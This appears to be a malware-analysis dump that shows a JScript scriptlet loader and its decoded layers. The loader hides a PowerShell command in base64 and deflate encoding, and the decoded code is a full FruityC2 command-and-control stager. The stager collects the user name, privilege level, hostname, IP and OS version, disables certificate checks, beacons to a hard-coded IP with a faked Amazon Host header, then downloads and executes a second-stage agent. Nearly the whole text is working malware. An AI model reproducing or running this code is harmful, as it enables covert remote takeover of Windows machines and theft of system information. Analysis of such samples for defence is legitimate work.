gBrAGIASAB5AEMAcAAxAEQAeQBjAG0AMABEADkAcwBjAE0AWQBiACsASgBnAFQANQBjAHEAYwBuAEkAYQBYAHMAUQBRAGgAawBqADUAbQBuAE0AQgBoAFEATQBJAEUAVQBVAGkATgBTAFoASgB4AHYAagBHAHAANQBKAHgAawBIAEMAagBsAGUASwBQADAAWABmAHIAZgB3AFUAegB3AHYAcwBvAEkATgAvAC8AcABuAHUATQBmAGoASwB1AGEAcwBJAHUAYwBWAGgAdwBpAGsAOABvADQAZABqAHcAbwBjAGEAYwBzAEUAUQBiAEsARgBhAHoAUwAwAHEAQgAvAHYAYQBrAGUAWAB6AEgAVwBKAEgAOQBqAG0ASwBwAGUAYgBlAFYALwBWACsAdgBRAGMAZQAxAHEAMgBUAHMAbgBRAHMAeABNAFMANwBkAG0AdQA3AG0AegBvADcAKwByAEYAbQBrADMAMQBRAC8AWgB5AFcAMQBUAGgANgBkAHQAcgBBAHMASwBaAFMAQQBmAEsAVgA4AGMAcwAwAFUAYwBNAFIAegBxAHgATABBAHkASABlAHYAbwBjAHcASQA1AEYARwB1ACsAbgBGAEEAWQBCADkAMABZADAAQgAyAGsAQQBlAGsAOQBCAEUAUgAxAHUAeQBGAGEARAAvAHQAcgBLAEwAegBFAGsAZgBnAGcASQAwADgAbgByADkAZgByADkAbAB5AGoASQBuAFcAMQBuAG4AdwBoAEcAVQBmAFEANgBTAHgAbABnAEYAMABTAHEAMwBOADQAegBTAHgAegBLAHQAYwB1AEkATABuAFMAKwBwAEEARwBkADYAZgByAG4AcABNAHAANAA0ADkAdwBVAG8ASwBuAHgAZgA3AGcAeABmADMAdABvAGkAKwA3AHgAOQBvAEUAegBXAHkAQgBrAGwAcQBlAE4AcABXAGQAcABlAC8AbgBMAEoAUQBaAGwASwAzAFkASgBiAHMAWABMAHkAbgBWAEcAaABSAFcAMwBBAEwAagAxAHAAaABjAHQAVwA2AFoAbABkAFYAMgB4AEcAQQBpAEsARwBXADcAVwBVADUAcgA2AEEAbwBRAEYAcgBKAEMAOQBOAGwAWABOAGEAaABrAHoAcAA1AEMAOQBXAE0AdAB6AGoARwBVAEMAcgBzAEMAYQB1AEoAeQBNAG8AdAB3AFEAQwB6AGoAZwAxAEUAegBIAE0AaQAyAHQAKwBoAHIAeQAvAGQAZwB6AHIAbgBxAG4AZgBtAHQARQArADkAbABqAGgAMwBnAEcATAAzAEcAawBVAFYAVQA4AHAAeQA3AGEAZgB5AFMAdQA3AFAAQQBsAGYAOABYADIAaAB6AFEAOQB1AEYAVgArADUANwBuAEcAdwBIAGYAegBwAC8AdwBiAFMASgA1AHcAdABsADAASABVAHQAbAA2ADcAKwBQAFEAbgBCAEYANgBsAHMAcABxAEkAYgBxAHQAZABUAGEATQB4AEwAZgBRAGcAYQB2ADcAZgBRAEoAdQBiAFAAcQB0AFgAbwAyAG8AMQAzAE0AbwA2AGoAawBEAFAANQA2AGIAUABWAFUALwBiAEgAKwAxADUAQQAvAEoAdABsAFEAVwB3AHEAcwAzAE8AbgBjAGwAVABiADAAbQBSAGUASABhAGUAZgBWAEUAWABDAFMAUgBRAEIALwBHAE0AbgBEAGIAMABhAEEAcQBzAHYAcgBFADMATQB4AG0AcQBHAG4AMwBHAE8AVgBFAEYAcABWAEIAWgBSAG0AOABtAGYANQBRADYATABvAG0ALwB3AGIAcABiAEIAaQB1AGYAaQBOADUAYgA5AFQAbgBOAEoAZgBOAFAAeQAzAEoANgAvAFUAeQB0ADkAYQBuAG0AZABkAG8AcQA2AE0AVgB0AHEAQQAxADkASgBPAHoAVABTAGEARABoAHEAYwBIADMAQwBKAFEAcABaADEAOABOAEYAMQB2ADAAQQBNAGYAawBEAFcAbAAwACsAdQAyADkAagBkAGwAZgBFAG8ASwAzAHMAUAB3ADAAZwA5AFIAVABDAFAAeQBvAGwAegByAHcANwBMADcAOQBEAFQASQBKAGgAZwBQAGoAUgBIAEsAMwBzAGoAdwBmAEoAMgA0AEsAaABwAHkAdABnAHAAcQB5AHkAYQBRADcAbQBEACsAUAAzAFcATgA2AC8AWAAxAEMASwBLAEwAUQBPAGQAagA4AE4ATQBjAGkAVwBTAGkAbgAyAHEANwBBADIARwBRAHgAUABpAGUAWgBiAFgAaAB0AEwAawBVAE8AUwBUAG8ARABDAE4AUQB4AFUASQBTAG8AVwAwAEUANAB1ADkAWABVAHMAeAB5AHcANwBlAHEASgBjAFkAZgBsAEEAaABGAEYASQB2AGMAagBRAHEASABPAG8AMgByAFUAbQA3AHcAdwByAHUATQBFAHYAbQB4AEwAMABxAGMAYwBhAFMAZwByAHAAZgBwAGcASgBoAFIATQBPAGMAOQByAEYARQBTADMAVAA4AGwATQBrAEgASgBUAEsAVwBvADEAdQBwADYAdgBYAEoAZwAzAEMAOQBPAEcAQwBoAEIATABiAFoAYgBQAG4AdABUAHMAZQBWADAANgBZAHUAZgBYADkAUwBIAFoAVwBTAFQAOABOAFMATQBTAGoANQBVAG0AdgBNAEsAUgAzAHYATAB3AFMARABpADEAbwBzADkAcQBjAFAARwA5AG0ATABnADQANABVAEIAVQA0AEIAawAxAE4AZwBVAG8ATABIAFMAZgAyAFIAKwBjAFgAUgBEAGsAMwA5ADYAZwBEADIARQBuADgAbgBqAFcAOQA5AFEAVQBkAE8ALwBrAFoAUwB2AEoAWQA0ADYAZgB0AEkAOQBrADcAaQBDAE0AeQBWAEEAVABwAGwAUQBIADAASwBlAG8ANgArAFUANABLADYARABMAHUAagAzADEAVABTAHAAeABXAG4ARwBHAHkATABJAGIAYQBVAG8AcABuADgAbwA3AHkANgBHAE8AcABwAFkASgBuAGQAawA1AGIAcQBaAHIANwBVAFYAOAA2AGwAdQBpAFkAdQA0AFoAcQAyAHoATwA0AHoAeQAxAGcAKwBFAEUAUgBwAFUARgBjAFMAZgBXAHUAMQBGAFUAUQBFADgANgAzADEAcAA2AE0AQwBBAEsAUAB4ADgAWQB2ADcAKwBZAHYAYgBxAEIALwBJAGYAMABhAE8AZwAvAEcANQAvAHIAbAB1AEsAQQBTAE4AYwAvAGEATABSAGgASABlACsAZQBqAFcAawBaAFYAZQBxAGQARgBGAEgAdwBIAEwASQBiAHIAdQBYAGgALwBzAEgAeQBLADQAYQBjAGsAcgB4AE0ANABuAHQAMwA2AEkAKwBIADIAegAwAFgAQwBoAGYARQBUADAAagBrAEEAQgBDAE8ANgBZAGsAZQBGAGkASgBFAFkAWgBGAEsATQBWAHkASgBFAFMAdgBkADkANQB2ADEAUQBCAHMAMQBnAHMAWABEAHoARgB2ADYARAAxAFEARAAwADAALwBnAFkAPQAiADsAJABkAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQA7ACQAbQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABtAHMALgBXAHIAaQB0AGUAKAAkAGQAYQB0AGEALAAgADAALAAgACQAZABhAHQAYQAuAEwAZQBuAGcAdABoACkAOwAkAG0AcwAuAFMAZQBlAGsAKAAwACwAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAcwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACQAbQBzACwAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAOwBJAEUAWAAgACQAcwByAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA");

	]]>
	</script>
	</registration>
	</scriptlet>

	## decodes to:

	var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "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";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) \| Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");

	## decodes to:

	var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "function Invoke-Stager {
	param (
	$r_server = "",
	$r_port = "",
	$r_ssl = "",
	$UA = "FruityC2",
	$SID = "SESSIONID",
	$pg_header = ""
	)
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
	[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls;
	[bool]$o_base64 = $false
	[bool]$o_encryption = $false
	[bool]$o_compression = $true
	$UUID = [int][double]::Parse((Get-Date -UFormat %s))
	$s = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) \| Out-String
	$USER = $s.Trim()
	if(([Environment]::UserName).ToLower() -eq "system"){$s='4'}
	elseif(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $true){$s='3'} # 3=High
	else {$s='2'}
	$LABEL = $s
	$s = (Get-WmiObject Win32_OperatingSystem).CSName \| Out-String
	$NAME = $s.Trim()
	$s = (Test-Connection $env:COMPUTERNAME -count 1 \| select Ipv4Address) \| FT -HideTableHeaders \| Out-String
	$IP = $s.Trim()
	$s = (Get-WmiObject Win32_OperatingSystem).Name.split('\|')[0] \| Out-String
	$VERSION = $s.Trim()
	$s = (Get-WmiObject Win32_OperatingSystem).OSArchitecture \| Out-String
	$s = $s.Trim()
	$OS_ARCH = $s
	function Get-Data {
	param($path = $script:path_get)
	try{
	$wc = new-object system.net.WebClient
	$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
	$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
	$wc.Headers.Add("User-Agent",$UA)
	$wc.Headers.Add("Cookie", "$SID=$TARGET;")
	if ($pg_header -ne "") {
	$hs = $pg_header.split("\|")
	foreach ($h in $hs) {
	$i = $h.split(" ")
	if ($PSVersionTable.PSVersion.Major -eq 2 -And $i[0] -Eq "Host" ) {
	} else {
	$wc.Headers.Add($i[0], $i[1])
	}
	}
	}
	$request = "http$($r_ssl)://$($r_server):$($r_port)$($path)"
	$data = $wc.DownloadString($request)
	return $data
	}
	catch [Net.WebException] {
	Write-Host "Get-Data ERROR."
	}
	}
	function deflate($data) {
	$s = $data
	$ms = New-Object System.IO.MemoryStream
	$cs = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Compress)
	$sw = New-Object System.IO.StreamWriter($cs)
	$sw.Write($s)
	$sw.Close();
	$s = [System.Convert]::ToBase64String($ms.ToArray())
	$s = $s.replace("+","-") # BASE64 URLSAFE
	$s = $s.replace("/","_") # BASE64 URLSAFE
	return $s
	}
	function inflate($data) {
	$data = $data.replace("-","+") # BASE64 URLSAFE
	$data = $data.replace("_","/") # BASE64 URLSAFE
	$data = [System.Convert]::FromBase64String($data)
	$ms = New-Object System.IO.MemoryStream
	$ms.Write($data, 0, $data.Length)
	$ms.Seek(0,0) \| Out-Null
	$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
	return $sr.ReadToEnd()
	}
	Function rx_data($data) {
	if ($o_compression -eq $true) { $data = inflate($data) }
	if ($o_encryption -eq $true) { $data = decrypt($data) }
	return $data
	}
	Function tx_data($data) {
	if ($o_encryption -eq $true) { $data = encrypt($data) }
	if ($o_compression -eq $true) { $data = deflate($data) }
	return $data
	}
	function stager($TARGET) {
	$path_stager = -join ((65..90) + (97..122) \| Get-Random -Count 30 \| % {[char]$_})
	$data = Get-Data -path "/$path_stager"
	Write-Host "STAGER: $data"
	[String]$data = rx_data($data)
	[Array[]]$temp = $data.split("\|")
	$stime = [convert]::ToInt32($temp[0],10)
	$jitter = [convert]::ToInt32($temp[1],10)
	$UA = $temp[2]
	$path_get = $temp[3]
	$path_post = $temp[4]
	$post_id = $temp[5]
	$session_id = $temp[6]
	$agent = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($temp[7]))
	Write-Host $agent
	IEX $($agent)
	Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -r_port $r_port -target $TARGET -post_id $post_id -session_id $session_id -r_ssl $r_ssl -pg_header $pg_header
	}
	$TARGET = tx_data("$UUID\|$VERSION\|$USER\|$LABEL\|$NAME\|$IP\|$OS_ARCH\|normal")
	stager($TARGET)
	}
	clear
	Invoke-Stager -r_server "159.89.106.106" -r_port "8080" -UA "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" -r_ssl "s" -pg_header "Accept /\|Host www.amazon.com"";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) \| Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");